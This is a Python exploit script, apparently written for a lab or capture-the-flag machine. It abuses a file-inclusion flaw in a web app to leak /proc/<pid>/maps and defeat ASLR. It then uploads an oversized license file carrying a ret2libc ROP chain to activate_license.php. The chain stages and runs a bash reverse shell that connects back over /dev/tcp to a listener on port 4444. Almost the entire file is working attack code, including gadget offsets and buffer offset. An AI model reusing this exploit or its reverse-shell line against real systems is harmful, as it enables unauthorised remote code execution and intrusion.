#!/usr/bin/env python3
import re
import requests
import struct
import sys
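# Target host running the vulnerable web app.  The reverse-shell callback
# address is a separate setting inside craft_payload().
ip = '10.10.11.154'


def p64(n):
    """Pack *n* as a little-endian unsigned 64-bit qword (like pwntools' p64).

    Raises struct.error for negative values or values >= 2**64.
    """
    return struct.pack('<Q', n)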
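def _mapping_base(maps, path):
    """Return the start address of the first ``/proc/<pid>/maps`` line for *path*.

    A maps line looks like ``55e3a000-55e3b000 r--p 00000000 fd:00 1234 /usr/bin/x``;
    the regex keys on the ``start-end perms`` prefix so that any HTML
    ``index.php`` emits on the same line as the included file cannot leak into
    the captured address (the old ``(.*?)-`` capture would then fail in int()).

    Raises:
        RuntimeError: if no line mentions *path* (wrong PID, LFI no longer
            working, or a different binary/libc build on the target).
    """
    pattern = rf'([0-9a-f]+)-[0-9a-f]+ [rwxsp-]{{4}} .*?{re.escape(path)}'
    match = re.search(pattern, maps)
    if match is None:
        raise RuntimeError(f'no mapping for {path!r} in the leaked maps file')
    return int(match.group(1), 16)


def get_addresses(pid):
    """Leak the bases of the target binary, libc and stack for process *pid*.

    Reads ``/proc/<pid>/maps`` through the LFI in ``index.php?page=`` and
    returns ``(elf_base, libc_base, stack_base)`` as ints, each the start of
    the first mapping of that object (the ASLR bypass for the ROP chain).

    Raises:
        RuntimeError: if one of the three mappings is missing from the response.
        requests.exceptions.RequestException: on connection failure or timeout.
    """
    r = requests.get(f'http://{ip}/index.php?page=/proc/{pid}/maps',
                     allow_redirects=False, timeout=10)
    # No status check on purpose: a redirect or error body simply lacks the
    # mappings and is reported as RuntimeError by _mapping_base().
    maps = r.text
    return (
        _mapping_base(maps, '/usr/bin/activate_license'),
        # libc path/version is hard-coded for this target; the gadget offsets
        # in craft_payload() are tied to this exact build.
        _mapping_base(maps, '/usr/lib/x86_64-linux-gnu/libc-2.31.so'),
        _mapping_base(maps, '[stack]'),
    )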
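def craft_payload(pid, *, lhost='10.10.17.44', lport=4444):
    """Build the ``files=`` dict carrying the ROP chain that pops a reverse shell.

    The oversized ``licensefile`` upload overwrites the saved return address of
    the target process (*pid* is only used to leak its bases via
    ``get_addresses``).  The chain is ret2libc: the command string is staged
    into a writable page of the binary eight bytes at a time with
    ``pop rdi`` / ``pop rax`` / ``mov [rax], rdi`` gadgets, then ``system()``
    is called on it.  The shell connects back to *lhost*:*lport*; the defaults
    reproduce the listener that was hard-coded in the original chain.

    Every staged qword is NUL-padded to exactly 8 bytes.  The original listing
    pushed the 5-byte tail ``&1' \\0`` as a bare literal, which shifted every
    stack slot after it by three bytes (the following ``pop rax`` address was
    split across two qwords), so the chain as shown could not reach
    ``system()``.

    Returns:
        ``{'licensefile': ('tmp_name', payload)}`` for ``requests.post``.
    """
    elf_address, glibc_address, _stack_addr = get_addresses(pid)

    # Gadget and symbol offsets are specific to the target's libc-2.31.so
    # build (see get_addresses); re-derive them for any other libc.
    pop_rax_ret = glibc_address + 0x3ee88
    pop_rdi_ret = glibc_address + 0x26796
    mov_qword_ptr_rax_rdi_ret = glibc_address + 0x8a0eb
    system_addr = glibc_address + 0x48e50
    # Scratch area for the command string.  NOTE(review): assumed to be a
    # writable page (.data/.bss) at ELF+0x4000 — confirm against the maps
    # output if the binary is ever rebuilt.
    writable_addr = elf_address + 0x04000
    # Distance from the start of the overflowed buffer to the saved RIP;
    # presumably found by crashing the binary under a debugger.
    offset = 520

    command = f"bash -c 'bash -i >& /dev/tcp/{lhost}/{lport} 0>&1' ".encode()
    command += b'\0'  # system() needs a terminator; also keeps the last qword clean

    chain = []
    for i in range(0, len(command), 8):
        word = command[i:i + 8].ljust(8, b'\0')
        chain.append(p64(pop_rdi_ret) + word)                    # rdi = 8 bytes of text
        chain.append(p64(pop_rax_ret) + p64(writable_addr + i))  # rax = destination
        chain.append(p64(mov_qword_ptr_rax_rdi_ret))             # *rax = rdi
    chain.append(p64(pop_rdi_ret) + p64(writable_addr))  # rdi = staged command
    chain.append(p64(system_addr))

    payload = b'A' * offset + b''.join(chain)
    return {'licensefile': ('tmp_name', payload)}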
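def main():
    """CLI entry point: ``python3 second_exploit.py <PID>``.

    *PID* is the target ``activate_license`` process whose ``/proc/<pid>/maps``
    is leaked to defeat ASLR, so it must be numeric.  A listener must already
    be waiting on the callback host/port used by ``craft_payload``.
    """
    if len(sys.argv) != 2 or not sys.argv[1].isdigit():
        print(f'[!] Usage: python3 {sys.argv[0]} <PID>')
        return
    pid = sys.argv[1]
    try:
        requests.post(f'http://{ip}/activate_license.php',
                      files=craft_payload(pid), timeout=(10, 15))
    except requests.exceptions.ReadTimeout:
        # The payload has already been delivered at this point.  If the chain
        # worked, system() presumably blocks on the live shell and the server
        # may not answer until it exits, so a read timeout is not a failure.
        pass
    print('[+] Sent payload. Check listener')


if __name__ == '__main__':
    main()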